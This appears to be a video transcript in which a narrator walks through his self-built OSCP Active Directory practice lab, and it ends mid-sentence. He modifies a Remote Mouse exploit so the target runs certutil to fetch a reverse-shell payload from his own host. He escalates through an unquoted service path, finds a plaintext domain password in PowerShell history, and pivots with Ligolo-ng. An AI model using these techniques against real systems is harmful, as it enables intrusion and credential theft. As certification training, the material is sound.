Hello everyone, welcome. Thank you for joining. So what I wanted to do here was document my Active Directory practice lab that I built as part of my OSCP experience. And this video is specifically going to be one of the easy quick attack methods that I practiced for getting ready for this component or this piece of the OSCP exam. What we have in front of you is you can see we've got our Kali box that's going to get VPN'd in, and it's going to be handed a 172.16.11.11 address. And then across the VPN, we'll be able to access the outside subnet, the 192.168.100. And from there, we'll be able to hit MS01, which is .201. MS01 is a Windows 10 machine, dual homed, and the intention here is we're going to know that we have an initial target of a Windows workstation to hit. We're going to know that we have a subnet on the other side, and on the inside subnet is going to be another Windows 10 workstation and a domain controller. So these are named MS01, MS02 for the workstations, and DC01 for the domain controller. Tried to make this relatively straightforward and as highly representative of what I expected to see on the Active Directory components of the lab. So without further ado, let's kick things off and get started. First and foremost, I knew that I was going to have to VPN into a server of some sort, and it was going to hand me access. I believe they do call out that it's going to be an OpenVPN connection because they want you to be ready to get that OVPN file. So here I'm logging into my custom-built OpenVPN server, downloading my profile that I would have received credentials for as part of my lab. Here we've got the profile. Let's go ahead and put that to good use. Let's blow this up a little bit. I always like to be relatively organized, so I'll start by just creating a couple folders. One would be the Active Directory lab. And then inside that, let's make one for VPN and our targets, MS01, MS02, and DC01. So here we can see our folders. Let's go into VPN and let's move that. Oh, we have multiple files here. Let's move that profile to, I'm going to guess it is, actually, you know what? We're going to go with the 3.9 file and drop it into VPN. Oh, really? Okay, so here we'll go ahead and clear our screen and run OpenVPN. Sure enough, there we go. We are connected successfully. 11.11. Alright, let's drop that out of the way. At this point, we're now connected. We have our 172.16.11 address, and we're connected to the VPN server. We should be able to hit MS01 and begin our enumeration. So let's kick that off. So oftentimes, the first thing I'll do is go into the folders. Actually, that's not true. The first thing I'll do is add these to my hosts record, or my hosts file, just to make my life a little bit easier and use DNS names. So let's do so 192.168.100.201 is going to be MS01. We know that the other one's 10.10.1.202 is going to be MS02, and 10.10.1.200 is going to be DC01. Let's go ahead and save that and give it a test. Ping 2 counts to MS01. Well, it doesn't look like it's going to respond to us, but that could just be the firewall. So we do see that the address translated to our IP, so we at least know that that's working. Let's cancel that. And now we're inside the MS01 folder, but we're going to want to continue to stay organized. So I'll create a couple more folders. Enu for enumeration, so I'll keep a lot of the stuff like my logs for scans I run. And then we'll create another one for loot, in case we find any goods like our local.txt or proof.txt files that we know we are expecting. Those are our flags that we need to pass the exam. And let's do files if we find any files, and exploits in case we need to download and work on any exploits. So from here, let's go ahead and run nmap. So we'll say sudo nmap. Let's do -t4 because I want to do this quickly. -p- against all the ports. Let's be verbose because I want to see very quickly what kind of progress we're making, or if we're making no progress. Let's go ahead and run this against MS01, and let's log this in the nmap format to enu nmap-ports.log. Oh, and right off the bat we can see, yes, while the server MS01 didn't respond to pings, it does have 443 and 80 open. And as soon as I see 80 or 443 open, I'm immediately thinking we're going to want to also run GoBuster for some directory brute forcing. So let's do that as well. Let's go ahead and do action split vertically. You can watch both of these go simultaneously. Blow that up a little bit and let's bring that over. So let's run GoBuster. dir as our command. URL is going to be http MS01 and our word list. So one of the common word lists that I would start with is going to be dirbuster's common word list. There's also the big one, and if you really want to be intense or exhaustive or make sure and be pretty foolproof, I also like the sec lists, medium, and the medium directory and the medium files. But let's not just leave this just on the screen. Let's split this off with T, and let's also save the output to enu gobuster-p80.log. So let's save our results as well. Oh, and we already got some good stuff here. So right off the bat we can see, that's funny, T actually looks like it takes out the color just for giggles. Let's go ahead and run this without T, just because that was pretty quick. And now I get my pretty colors. So in here we can see 403, we're not interested, that's access denied. 301, okay, so we have a dashboard. 200, favicon, okay. Image directory, index.php file, and ooh, okay, and we have an uploads directory. That is something I'm always interested in. So there's an uploads directory that tells me that there may be some juicy goods there, or we have the ability to maybe do some exploitation by uploading some content, maybe some client-side exploitation. So it looks like our nmap scan finished. Let's go back here. So we've got port 80, 443. We also found 1978, 79, and 80 open. Let's see if we can fingerprint those. Those do not look familiar to me. So instead of running just against all of the ports, now that we've enumerated and we found what's open, let's fingerprint those, and let's also do some service enumeration. So let's call this one services.log. So we're going to save it as a new file, and instead of running against all of the ports, we're going to run against only 80, 443, and 1978 to 1980. And let's also run our common scripts and version fingerprinting. Alright, so there we went through, discovered those ports are open, and now it's running service scans. So again, let that bake. Come back over here. Let's look at what we found with GoBuster. So first off, let's do some manual enumeration. We did find that MS01. Okay, so right off the bat we can see that it redirects to /dashboard. That tells us this is a default page. Tells us it's XAMPP for Windows. So okay, confirms Windows box. We already know what services are running. Ooh, phpMyAdmin. Nope. But it does tell us Apache version, OpenSSL versions, and PHP. Oh, okay, yep, sweet. So we have PHP info. One of the things I love about PHP info, when people leave it enabled, good old defaults, is it also tells us about where it's installed. So in this case, if we, yep, there it is, document root, C drive, XAMPP, htdocs. So right off the bat, we have a pretty good understanding, or a better understanding of some file structure, and that this is a non-standard install, as that it's not in C program files, for example. So this is helpful. Let's continue on. So dashboard, let's open that link. Takes us right back here. So that's the one that we saw earlier. All right, how about images? Got 2 images. That looks like a default image. Default image, so those are just part of our welcome page. What about, okay, we will see index redirects to dashboard, so that's not helpful. How about uploads? Yeah, let's check out uploads. Hello. Here we can see we've got a file available to us. That is fantastic. So maybe this isn't something where we need to upload. Maybe this is something where we're doing some discovery. So we downloaded that file. Hey, we created a files directory. So let's go to our files directory. Let's move that file here. And let's also do some enumeration on that. So there's a program called exif tool that will take a look at the metadata of anything, any files that you give it. Okay, so this looks good. We've got some info. So while the file name is some random string, we know it's a Windows 32 portable executable 32-bit. It's meant as a Windows GUI application. Hello. This install was built with inno setup. So this is an installation executable for a company's software. The company made its remote mouse. File description, remote mouse setup. Hello. And not only do we have a software name, but we've got a version number. This is really juicy. Oh, so this is good stuff. There's usually something I would do next with this, but it looks like our Nmap scan finished. Okay, this didn't look like it printed out very well, so let's do it clear. This is why we save our stuff. Let's just do cat enu nmap services. What did we find? Okay, so port 80, Apache 2456, 443, Apache 2456, and welcome to XAMPP. And welcome to XAMPP. So it looks like these are both the same web page, same web capabilities, same web server. It's just running on 2 different ports. And here we look at 1978. Still don't know what it is, but we did send a bunch of fingerprint strings to it. And this is what we got in response. So we still don't know what it is, but it does respond and tell us something. 1979, we don't know. 1980, we don't know. And we didn't have any responses from anything. And here specifically, we can see, yes, we have an unrecognized service on port 1978. And we sent a whole bunch of these strings. Time, x86, 64 PC Linux, generic lines, DNS version, LDP string, landes. We sent a bunch of things to it, and every time it looks like it sent back the same thing, which is what we're looking at here. So it's basically this /x20 is a space. So it's just this same response every single time. All right, so nothing super extravagant, but we've got some unknown ports. Let's go back to the other thing that we found here, which is this file. So as soon as we find a version, what would we do with this, right? We want to know if this is some vulnerable software. So one of the first things we might do is look in searchsploit, which is just the command line searchable index database for offline index for exploit DB. So let's type in remote mouse, see if we get any hits. Okay, we do get some hits. To be more specific then, how about remote mouse 3? How about remote mouse 3008? Yes, this is very specific. Not only that, but we've got a local Priv Esc, and we've also got a remote, looks like remote command execution. Arbitrary remote command. I like arbitrary remote commands. It means I can do what I want. Let's take a look at that. So if we do, let's go out of here into our exploits, and let's go ahead and do search exploit -x 46697. Tell me more. So remote mouse 3008 fails to check for authentication and will execute any command any machine gives it. Wow, that's very safe. I love this. This is looking very promising. Even tested on Windows 10. Okay. This script pops a calc as proof of concept, albeit a bit slowly. So that's something we need to keep in mind. Is this may be a slow exploit that we need to be patient for. It also has an index of key codes the app uses to communicate with the computer if you want to mess around with it yourself. I love messing around with stuff myself. That's okay. This is fantastic. And it's running on Python 2. Okay, so it's old, but that's fine. We can run Python 2. Oh, what is this? So right off the bat, there's defined. In here, we're seeing we're going to open up a socket. We're going to connect to it on port 1978. This is port 1978. This is port 1978. And we're going to get a response, buffer it, and basically a kilobyte, it looks like. If response equals that, does that look familiar to you? That looks familiar to me. That looks like this. So if the response is that, return true. Otherwise, return false, except, so any exceptions, we'll just assume it's a request timed out. This is looking beautiful. This looks like a match. So let's kind of breeze through this, move mouse press, okay. We've got some different mouse options, left click, right click, middle click. Ooh, we can middle click, yay. Here looks like a dictionary of all of the different keys we can send, A, B, C. Okay, here we go, main. So try grabbing the argument, saving it as target IP. Make an exception if you don't give me that, and please tell me what exploit, and then an IP address. If ping equals true, which we saw earlier was looking, it's not actually ping, it's looking for this response, then popcalc with the target IP. Here is popcalc. What's it going to do? It's going to move the mouse. Negative 5,000 pixels, 3,000 pixels. This looks like moving to a corner. And then we're going to left click, sleep for a second, then send a string, calc.exe, sleep for a second, and then /n. So that's probably like a return character, like hitting enter on the keyboard, right? And then print success process calc has run on target. So if I were to guess, this looks to me like it's going to move this maybe down to the bottom left corner, hit the left mouse button, which if I were to move down to the bottom left mouse button on Linux, it doesn't give us anything, just the bottom left corner. But on Windows, what's in the bottom left corner? That's the start menu. So if I clicked on start and started typing in calc.exe, it's just going to offer up calc.exe, and then as soon as I hit enter, it's going to open it. So if I were to guess, I would say that's exactly what it's doing. It's clicking on start, typing this out, and then hitting enter. So we can abuse this. We don't want to open calc though. What do we want to do? We want to get an initial foothold. How do we do that? Well, it's definitely not with calc. If this was a Linux machine, we could use netcat or do some living off the land perhaps. But in this case, we probably need to generate a shell or generate a payload that will give us a shell. So we can use MSF-Venom for that. Once we have a payload, how do we get it over there? How do we execute that? Well, can't really use, what's one of the native tools we could use? One of my favorite tools is the certificate utility. So we could use certutil and then have it transfer the payload from our Kali box, right, over to MS01 and then execute that payload, which would then give us a reverse shell back to our Kali box. So let's give that a shot. Let's see if we can do this. So let's go ahead and download this exploit since it looks like a match. And then let's go ahead and tweak it a little bit. But first we need to build a payload actually. We need to have something to serve up. So make directory payloads. Let's go into our payloads directory because we may end up reusing these a few times. Let's create a reverse shell. So if anyone's familiar with MSF Venom, that's one of our fond tools that we love to use, especially on the OSCP. Let's create a payload. It's going to be Windows 64-bit. And what do we want? We want a shell. We want a reverse TCP shell is what we want. And where do we want to have it call back home to? lhost, localhost. In this case, that's going to be our VPN IP, 172.16.11.11. What port do we want to call it home to? Ooh, okay, that's a good question. So we could use an arbitrary port like 4444, but we saw that ping wasn't responding earlier, which indicates Windows Firewall is probably on. So if we have it go back on just any random port, it's probably not going to be able to get through the firewall. What ports do we have open, or that we know are open through the firewall that we can take advantage of? My money, one of my favorites, is 443, right? So and we know it's open because we can access the web server. We scanned it with Nmap. We know it's open. So let's use 443 as our callback. And that should get through the firewall. What else do we need? We need a format that's going to be an executable, and we need to spit it out as a type of file instead of just raw payload. So let's spit it out as Windows reverse port 443.exe. And if I didn't screw that up, it should give us a payload, and sure enough it does. And I did not select a platform, but it noticed the payload was Windows. I didn't select an architecture, but it saw the payload 64-bit. Did not encode it, so it is raw, and sure enough we have a file saved as winrm 443. Beautiful. Now we need to be able to serve it up though. How are we going to get it there? Let's just do a quick and dirty Python. You open up a module. How about the web server module and run on port 80? Boom. We have a web server on port 80. We're running right now on our Kali box. How do we get it over there? This is where we are going to abuse, well, we're going to modify this exploit. If we jump down to line, I don't know, let's call it 120. Oh, that was pretty good actually. Here's our pop calc. Here's where it's going to type in calc. I mean, we want it to move to the bottom left. We want it to click, and we want it to wait for a second and open up the start menu. We don't want to enter calc.exe though. We do want to send a string. How about instead of calc.exe, we use that cert utility. So certutil.exe, helps if you can spell right. There's no spell check on here, Darren, don't screw it up. So let's do certutil. Let's do URL cache because we want to, and -f, we want to pull this over the network. HTTP 172.16.11.11. How about winrm443.exe is our name. Running out of space here. Let's go ahead and pull this over. And we have to tell it where to save it. So most folks like to save things in C drive, Windows temp, winrm443.exe. I don't though. I actually prefer, if you were to fingerprint, what are Darren's tactics that he likes to use? He likes to be different. So he'll use C drive users public because that's also a publicly writable location. And let's close this. It's actually, whoops. Cancel that. There we go. So let's close that quote, and then we need to tell it to go to the IP. That should work. And then we'll sleep, we'll hit enter, and it will download. So let's save that. Let's do this one step at a time. First and foremost, we'll be able to see any progress on the left-hand side. Let's go ahead and clear this screen. Run our web server. We should see the request come through. Let's do Python 2 and our exploit and then just check. Oh, sure enough, it does not like what we've typed in here. What did we miss? Line 119 with the comma. Does not like our comma. Let's go to line 119. So we've got send strings or util.exe, raw cache, all that good stuff. Extra space we can get rid of. That looks right. Oh, Python 3. That's the problem. Python 2, Darren. Okay, so Python 2 works for us, and it tells us we're missing a variable. So let's go ahead and do Python 2. Well, first of all, clear Python 2 and MS01. Here we go. We don't know if this is going to work, if it's not going to work, because we didn't really get a lot of feedback, and we also know it's going to take a while. So the only indication we can look for is if our web server gets a request. If it does, we'll see it pop up in here. If we didn't mistype anything and it asks for the file that's available here, we'll return a code 200 to say, yes, here you go, here's the data. If we see it's a code 404, that's telling us that we probably mistyped something and that it did make the request, but we didn't have the right file or data or directory to serve up to the request. So we'll see if this comes through here, but as of right now, it's at least running. And sure enough, there we go. So this is fantastic. This is exactly what we wanted to see. A GET request for the /winrev443.exe, and we returned a code 200, which means yes, here you go. So step 1 complete. Let's go ahead and kill this web server, clear that, and let's edit our exploit. Step 1 complete. Download our payload. Step 2 is execute our payload. So let's go ahead and comment that out, but keep it around. Send string. We're just going to change the string now, right? We're going to say now I want you to go / for the C drive, users public winrev443.exe, send that to IP, and then sleep and hit enter. And then instead of saying process calc has been run success, victim has been pwned. Alright, but we're going to need to catch that shell, right? So let's go ahead and set up our listener, good old netcat, -listen verbose, no name lookup, and port 443. Alright, we're listening. Let's run this bad boy and hope for the best. Again, be patient because it feels like it takes time to probably move the mouse and then click these buttons. If this was a real environment, then we'd be very much picked up by the end user on that machine, seeing their mouse move and then seeing characters being typed in. That would be pretty apparent that something is wrong. But being the OSCP exam, doesn't matter. We know that this is a headless device. And sure enough, here we go. Success, victim has been pwned. That doesn't mean anything. What does mean something is we've got a shell. Smell that? Nice fresh shell. First thing that you do when you land on a new box, right? We can see it's Windows version 10. Fantastic. But the second question you ask is, who am I? Okay. So I am Lucy on MS01. So this confirms that we are a local account on MS01, not a domain account. Well, the second thing we want to know is, now that I know who I am, I'm Lucy. Second thing I want to know is, what privileges do I have, right? Okay, these are default privileges, see those all the time, but this one is not. Shutdown privilege? So this actually means, even though it says states disabled, it actually means that the security privilege is not enabled. So I actually have the ability to shut down the machine. From a operational standpoint, that may seem weird. Okay, Darren, you can shut down the machine. It's not going to do you any good. But what it also means is that if I want to exploit a service or a scheduled task that occurs upon startup, I may not have the privilege to execute that task or to restart that service. But if I have the ability to reboot the machine through the shutdown command, then actually I do have a ability to restart that task or that service. So that's something to keep in mind and something to look for. Once you notice you have a certain privilege that stands out, see if there's ways to take advantage of that. Now, there's a number of different things that we would do through here, like run net user, see if there's any other local users on here, local group administrators. Tell me more about who has administrative access on this machine. Oh, okay. So the domain admins have access. Well, that makes sense. That's a default, but that also verifies this is a domain joined machine. Now, there's a number of other commands that we could run, and again, as someone who's taking the OSCP, you should have your short list or your cheat sheet or your reference material for all the commands to run. But one of the ways to collect a lot of that data quickly is to actually leverage the Ps. In this case, there's two versions. There's linps and winps. We're on Windows, so you can guess we're going to want winps. Now you can just Google this. I will go to the GitHub, go to the releases here, and sure enough, here's all of our versions, linps, winps. We're on a 64-bit Windows machine, so we're going to use WinPsEx64. And when we go back over here, let's go ahead and stage this and transfer it over. So instead of our exploits, let's go back over here to payloads, and let's move downloads winps to here. Only we're just going to call it winps.exe, make things a little bit easier. Okay, did I miss something? Oh, okay. Thanks for that. So we're going to rename that to winps.exe. Okay, so there we go. Now we've got it named WinPs, and we can see it's not hidden. And we're going to go ahead and run our Python web server again. And we're going to grab this. Again, I like to go back to C drive, users, public. And then here we can see our reverse shell payload. Let's add to this. Let's use this as our little repository. So cert util.exe, URL cache f, and HTTP 172.16.11.11. What do we want? We want winps.exe and save it as winps.exe. Sure enough, it downloads it. And we saw the 200 code here. So now we have WinPs on our machine. Let's use this. So again, continue to do your manual enumeration, but also don't forget to use the best tool for the job and supplement your manual searching for something like WinPs that will go through and dynamically, automatically collect a lot of the same data you're going to do. So use this to get the bulk of the data, let's say at 90%, and then manually enumerate the last 10%, especially because you need to be efficient and time is not on your side. You only got, for the OSCP, 23 hours and 45 minutes. So we're going to let this run. Again, I would typically have two shells running, so I'd run the exploit again, have another shell open, because you can have as many shells as you want, right? And then run WinPs in one. While it's running, go ahead and do your manual enumeration. In this case, I'm going to pause the recording. We're going to jump back in here in a couple minutes when this is done. Okay, well, while WinPs is running, we actually have enough data on here. We can start to review some of this. Now, I'm not going to review all of it. If you're familiar with WinPs, linps, you know that you get a ton of data. So the key is, again, to know what to look for and how to look through it quickly. So some of the key things, we'll go back up here, start at the top. anything in red, generally worth looking at. That's a high item to evaluate. Anything else, you want to look for specific things. So system info, this is great, confirms things like the domain name, oscp.lab, fantastic. Tells us a little bit more about the machine, confirms some of the things that we already knew. If you do, in this case, get some vulnerabilities powered by, love you, Watson, then they're worth looking at or keeping in your back pocket. If you've tried everything else and you've enumerated everything else and you haven't found anything, kernel exploits or Windows kernel exploits are always fantastic options. And in some cases, if you're familiar with some of them, you may immediately say, oh, this is worth evaluating, this might be viable. Otherwise, hit and miss, I would say, in my experience, more miss. Now, as we go through here, great system environment variables worth looking at. Nothing stands out there. Lapse is not installed. LSA, credential guard, cached logons. That's always good and interesting when we have cached logons. That's potential that once we get admin, we can look for some credentials. Prompting for Windows binaries. We don't have any PowerShell history, so can't gather anything there. Some of these checks require admin privileges, which we do not have. Some of these, okay, landman compatibility, NTLM v2, so that tells us what kind of passwords we can get as only NTLM v2, so we need to be able to crack them. We're not going to be able to pass them if we gather them by just the hashes themselves. Pipes, all of this is good stuff. I would normally start to evaluate, okay, users, oh, local admin is disabled, so that's not helpful. Lucy's on here. I'm not seeing any other users, so it looks like we're going to need a domain user if we want to elevate privileges, or we're going to have to exploit something because there's no local admins that we can take advantage of either. At least not that are enabled. Okay, here we go. Ever logged on users. We have another user, an OSCP domain user called Wildstyle. Okay, I like it. Sounds like a Lego theme maybe. Lucy, Wildstyle. So this is something to search for. And this is confirmed when we look at home folders. There's a Wildstyle folder as well. Auto logon credentials. We can see Lucy is there. And as we go through this, so processes are interesting. See if there's anything red that jumps out. WinPs, well, that's because we're running it, so that's why we get the ability to hijack our own process. Same thing with the reverse shell. So OneDrive, interesting, but that's again our OneDrive, so not helpful. Vulnerable leaked handles. You'll get a ton of stuff here that's not really helpful at all. It's just a bunch of noise. So we scroll through this. And as we get down, so the next section is services. So this is an area where we definitely wanted to pay some attention as well, because we saw earlier we could shut things down or do the restart shutdown permission. So, okay, possible DLL hijacking with Apache, because we can write and create files. May or may not work. Remote mouse service, no quotes and space detected. Okay, so an unquoted service there maybe. And oh, here we go though. Wise boot assistant. Here we see no quotes and space detected, and we also have file permissions, and that we can write data, create files. So this looks like the better option. We don't have those kinds of permissions up here. So this looks like something we want to take advantage of. So how would we take advantage of this? How could we exploit this? If you answered, well, we want to create an executable called appswise-wise.exe, that's going to get executed before it looks into WiseCare 365 for something else. So that's what we need to do. Well, how can we take advantage of that? We can create another payload, or we can take advantage of the fact that we already have a payload there ready to use. So let's see if we can do that. Let's go ahead and change. So here we have our WinRev 443. Let's go ahead and move to the C drive. Here we can see we've got apps, setup. Ooh, anything under setup? Auto logon. That's not cool, not helpful. XAMPP, which we saw earlier, and then apps. So let's go into our apps where we saw that there is the WISE directory. But where things diverge, this is where we're going to take advantage of this space. We're going to say copy users public winrm 443.exe to here, and we're going to call it wise.exe. So now, sure enough, we had permission to do it. It let us. So we've got a wise.exe. So while we don't have the ability to restart that permission because we're just a limited user, what we can do for sure is restart Vox and have a listener at the ready. And instead of being Lucy, because this is running as, well, did we see? We did not see actually. So let's go ahead and clear the screen here and get rid of some of this clutter. CLS, oh, I guess that doesn't really work on here. It's fine, we can do this. So we can use the good old SC for service control, and I believe it's QC to look at the configuration of, what was it, WISE something? SC QC, can we do an asterisk? Of course not. Well, then that's fine. In that case, how about just SC talking about SC query. Okay, so SC query, and then we can do SC query find stir. I don't care about case wise. There it is, wise boot assistant. So SCQC wise boot assistant. Boom, there we go. Okay, so here we can see we should get a shell as local system. That is exactly what we want. We want to get elevated. So, fingers crossed. Let's go ahead and stop here. And what we'll do is we're going to kill this and open up a listener as quick as possible. So we'll say shutdown, reboot in 1 second. Do it. And we got dropped. So really quickly, same thing. We're going to listen and hope for the best. We should get a shell. Oh yeah, this is what we wanted to see. Sure enough, we got a new fresh shell. And what's the first thing we do when we get a fresh shell? Who am I? Bam! We are system on MS01. We just got admin access. So at this point, I would typically go ahead and pilfer the loot, because now we have full access. As the local user, Lucy, what I forgot to do, what we should do, is we should have looked for our local.txt, because the limited user should have a local.txt, but as admin, we should be able to find the admin loot, which is the proof.txt. So let's go ahead and do that first and foremost. So I'll start by just going to the root directory, usually under users, because these files are supposed to be on Windows underneath folks' desktops. Here we can see we've got admin, Lucy, Wildstyle, and of course the default public. Let's just do a quick search for our files though. So we'll do /s/b, and we're looking for local.txt. Yes, and sure enough, it actually was under Lucy's desktop. Again, manual enumeration, which we should have been doing concurrently with WinPs, would have found that. So let's go ahead and type that out. Paste selection, boom. There's our loot for local.txt. So let's go ahead and save that. MS01 loot. And let's just echo paste selection into local.txt. Sure enough, there we go. Now let's let's find our admin loot. So /s/b/s/b, I don't know why that's so hard for me to say. And we're looking for proof.txt. Absolutely, just as expected, admin desktop, as it is supposed to be if it exists on the exam. So let's go ahead and type that out. And sure enough, there we go. We're cooking. That is our proof.txt. Yeah, buddy. Now we're making progress. We got our loot. We would definitely also then do, if this was the exam, what we should be doing is gathering both of these and then typing in who am I and ipconfig. And then I also, for good measure, just like to type in hostname. And then you would grab a screenshot. Oops. Oh, I wanted to make it smaller. Well, anyway, we would grab a screenshot of this. So that, there we go. That's what I was shooting for. Screenshot all of that, and that would be your proof for submission of those two. And you would also submit these hashes with the corresponding IP address in the submission form. So with that being said, we have just not only gotten an initial foothold on MS01, but we have also gained local admin access on MS01. We haven't gotten into the Active Directory components yet. We still need to pilfer that and figure that out, but we've at least gotten the ability to start leveraging that admin access to enumerate more of MS01 and look for some Active Directory crumbs that will allow us to start to enumerate more internally. The other thing we can do is we can create a pivot point, and we should definitely do that. So first and foremost, now that we see we've got our dual homed machine, let's continue to enumerate. And then after that, let's create our pivot, and then we can use that pivot to enumerate further. And with that, I'm going to go ahead and clean some of this up. And we can clear this, and we're good to go. Back in action. Oh, and one thing that I definitely forgot to do is take good notes. I've been doing that on the side here. I've not been doing that while we've been working in Kali. So let's take my notes. So typically, as you're going through and doing the OSCP exam, and as you're practicing, you should be taking plenty of notes. We'll just open Mousepad. Let's go ahead and use that. Drop in my notes I've been taking on the side. So first and foremost, right, we have enumerated. Let's move this around. Let's minimize that. So first and foremost, we know what our hosts are, and we typically would have known this based upon, again, the submission portal and the control panel where we can reboot the hosts, reset them, and also where we are going to submit our flags. So things to try. This is as we continue enumeration and as we find potential vulnerabilities or new things that we need to enumerate further. This is where we list those things to try out. Open ports, well, we've scanned MS01 so far, and this is what we've found. And then the path to compromise. I always like to keep a log of, okay, how have things progressed? What's the storyline been like? Or if I were to build a timeline, what would that look like? So here we can see we found that web server on MS01 with a file that was an executable. We downloaded that file, and the metadata revealed that we had Mobile Mouse 3008 software potentially installed. And we noticed that it listens on a port that actually happens to be open as well, and it's vulnerable to unauthenticated remote code execution. We then exploited that vulnerability and used it to download a payload and obtain a reverse shell as Lucy. And we used WinPs at that point, and it revealed that the Wise Boot Assistant service was there, and it was vulnerable to an unquoted service path attack. And we used that to obtain a privileged reverse shell. And at this point,
what we should be doing is leveraging that shell to continue further enumeration. So our next step would be further enumeration of MS01 with the intention of finding Active Directory breadcrumbs, something to allow us access to Active Directory, because at this point we're on MS01 and we should be able to ping and reach around internally, but we don't have even credentials to query services on DC01 or MS02. So nothing that we have with Lucy or local system credential, local system access is going to allow us to get any internal access to Active Directory. So with that, let's continue to enumerate. And on here, normally we'd go through a number of processes. We would do some manual enumeration. I immediately saw earlier, and one of the things I would start to work with is looking in the users directory and noticing, and we saw this earlier, that there was a previously logged on user of Wildstyle that's a domain user. Well, as a local admin, or with someone with local admin access with our privileged shell, we can actually go into Wildstyle's directory and see inside. Everything looks normal. One command I like is tree, and I believe the flags are /f/a. Here it shows us there's basically nothing here. If we had a file underneath, it would enumerate and show further. So in this case, not seeing anything jump out, but there are hidden directories in here as well. So let's just do a quick search. Let's look for one of the first things I'll look for is text files. So are there any log files? Okay, and there's a PowerShell log file, and I'll also look for, are there any text files? Same thing. So we're seeing somebody who's using some PowerShell usage. Let's check that out. I'm immediately going to prioritize someone's command history with PowerShell. So let's type that out. Tell me what's been going on. What's Wildstyle been doing? And we struck gold here. So we can see they were obviously running some commands like ipconfig and hostname, but then this looks like a remote PS session. They tried to run a PowerShell session over to another machine called MS03, which doesn't exist or didn't exist at the time of this. Obviously we only have MS01 02, but they tried to, or did connect to MS03 with these credentials, and we can see they used the username Wildstyle, and this is Wildstyle's password. So at this point we need to update our information. We got some new stuff. We found our Active Directory breadcrumbs. Again, normally would have spent a little bit more time doing some further enumeration. We wouldn't typically find this very quickly, although one of the first things I will do is start to find any additional user data or user history that stands out upon looking at WinP's logs. So at this point we found Wildstyle's credentials in PowerShell history on MS01. So at this point, let's go ahead and save this, and let's drop this into our desktop, Active Directory lab, and we're going to call this notes. Oops. There we go. So at this point, now we need to do our next step, and we also need to add in, we've got open ports. What else have we discovered? Credentials. So we have MS01/Lucy hash, and that's in the WinP's log there. We can go back to our console history if we need to. We also now have OSCP/Wildstyle, and that is awesome 24 exclamation or bang. So let's copy that, add that, save our notes. What would we do next? Now that you got some credentials, what would you do? I know what I like to do. I like to immediately start to use that to enumerate further Active Directory credentials and users and information. And there's a few ways we can do that. But let's just go ahead and mark this down. Enumerate Active Directory further with wild style. So at this point, let's go ahead. Actually, let's go ahead and clear our screen. Old school way. Let's save this, shrink that down. Well, at this point, you're probably wondering, well, what's next? How do we get access to this inside network from our Kali box, when right now we can only get access to MS01? And the answer to that is, well, there could be a couple different answers, but one of my favorite answers to that is a piece of software called Ligolo-NG. This is a fantastic pivoting tool that allows us to essentially create an interface and then leverage that interface for our pivoting. So let's go ahead and download this. And we're going to need two things. We're going to need the agent that's going to run on our victim. So we'll want the Windows 64-bit. And the other thing we're going to need is the proxy, which we're going to run on our server, or Kali in this case. So we'll go with the Linux 64-bit. At this point, let's go ahead and follow the instructions here and get it set up. It's actually pretty easy. So from here, let's go ahead and bring this over. Actually, let's go ahead and go to our downloads directory. Here we have our files. Let's just go ahead and extract. And there's our agent. So we're going to move that to our desktop and payloads. The other file we're going to need, I believe in this case it's going to be this gunzip file. So the gzip, yeah. So in this case we want -d. And there's our tar. So in this case, was it untar? tar xvf. Sure enough, there's our proxy file. Let's go ahead and move that. And because that's what we're going to run on our Linux box, let's go ahead and remove that to our bin directory. So sudo move proxy user bin. Now let's go ahead and remove all this. And let's go ahead and make sure we have our proxy. Boom. Alright, so things are looking good. Let's go ahead and follow our setup guide here. So first thing we're going to do is the creating an interface. In
this case it's mode ton Ligolo. Then we're going to go ahead and set it to the up status. Sudo IP link set Ligolo up. Alright, so now our interface has been created and it's up. So if we were to do if config, you can see there's ton 0. Oh, it wouldn't in this case, sorry, Ligolo. Alright, so now at this point we need to actually get the agent to connect and then we can continue on. So let's go ahead. So now what we need to do is let's go ahead and get the agent file moved over to our victim. So let's go ahead and go back to our payloads directory, create our Python web server. So now we can serve up agent, and let's go ahead and transfer that over. Again, I like to put it in my public directory, so we'll do cert util URL cache. And we're going to transfer agent.exe. Uh-oh. Helps if you can spell. Let's try that again. Much better. Alright, so at this point, now we've got the agent ready. We need to create our server proxy. So we'll stop our web server, and in this case, let's go ahead and run our proxy server. So we'll say proxy -self cert, and boom. Ligolo server is up and running, and it's listening on 11.601. So now on this side we'll say agent.exe and -connect 11.601. We'll say retry and ignore cert. Boom. Look at that. And the authority system on MS01 has connected. So now if we type in session, it says which session would you like? Well, we want the only session we got. Let's do number 1. And here we are on there. So now at this point we could type in if config. We can see we've got our 10.10.1.201 interface as well as our outside interface. So now all we have to do is type start, and boom, we have started that tunnel and it is accessible to us. We have one last thing that we need to do, which is of course assign routing. How are we going to get there? We need to tell our box how to get there. So let's just go ahead and do this. So we've essentially got the agent running, and we can see any status messages here. We've got the server running and the tunnel created. So let's just minimize this. Let's create another terminal session. And at this point, let's go ahead and do some further enumeration. We should be able to ping, for example, the DC. So let's pick on DC01. It's a good place to start. Pick a folder called enu, loot, files, exploits. And for giggles, at this point, well, actually, before we do our giggles, first we need to add that route. So we'll say sudo IP route add 10.10.10/24. Where do we go? We send it to our Ligolo interface. Oh, and it would help if we can spell correctly. Boom. Here we can see this has been added, and we should, for example, send 2 packets to DC01. There we go. We are in business. For giggles, let's see if MS02 responds. Unsurprisingly, it does not. It most likely has its firewall. But we can see that we at least have connectivity and routing. So, let's start enumerating. Now that we can enumerate, what are we going to enumerate? Well, we need to enumerate the services, right? So, let's go back to our nmap. -t4, -p-. Actually, in this case, well, because we know we're going to have lots of ports open on the domain controller, we'll do common scripts and version fingerprinting across all those ports, but let's not do it across all of them. Only run scripts and version fingerprinting on ports that are open, please. And we're going to run it across DC01, and let's log that to enu nmap ports versions log. And we're going to go ahead and, oh, you know what, let's add, just for giggles, a -v, because I would also like to see what's going on. And right off the bat, we can see we've got ports open. So we'll let this bake. Actually, I take that back. We're going to work concurrently, right? We're not just going to do this against DC01. Let's split vertically. And let's run a concurrent one against MS02. So similarly, we can go ahead and say make directory enu files loot exploits sudo nmap -t4 -p -scv -v MS02, save the output, nmap ports versions.log. Yep, that looks good. Let it bake. And sure enough, yep, we at least found 135 is open. Alright, we'll come back to this shortly. Actually, as I'm noticing this running, one of the reasons why I like verbose is we can already see we've got port 445 open, which is SMB. So let's, while we've got these guys running, let's continue by, we're going to split this again. So we'll move this over, we'll be on this side, and let's split vertically. And while those are running on this side, let's go ahead and check out SMB. So SMB client is a fantastic application we can use here. Let's just do list DC01 user is going to be wildstyle, because we know 